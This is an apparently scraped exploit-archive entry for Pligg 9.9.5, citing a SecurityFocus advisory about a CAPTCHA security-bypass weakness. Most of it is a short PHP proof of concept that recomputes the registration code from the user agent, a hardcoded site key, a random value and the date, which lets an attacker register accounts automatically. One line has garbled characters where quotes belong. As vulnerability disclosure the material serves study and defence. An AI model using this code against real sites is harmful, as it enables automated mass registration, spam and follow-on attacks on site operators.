21 lines
No EOL
567 B
PHP
21 lines
No EOL
567 B
PHP
source: http://www.securityfocus.com/bid/30518/info
|
||
|
||
Pligg is prone to a security-bypass weakness.
|
||
|
||
Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
|
||
|
||
Pligg 9.9.5 is vulnerable; other versions may also be affected.
|
||
|
||
<?php
|
||
|
||
$sitekey=82397834;
|
||
|
||
$ts_random=$_REQUEST['ts_random'];
|
||
|
||
$datekey = date(<EFBFBD>F j<EFBFBD>);
|
||
|
||
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
|
||
|
||
print substr($rcode, 2, 6);
|
||
|
||
?>
|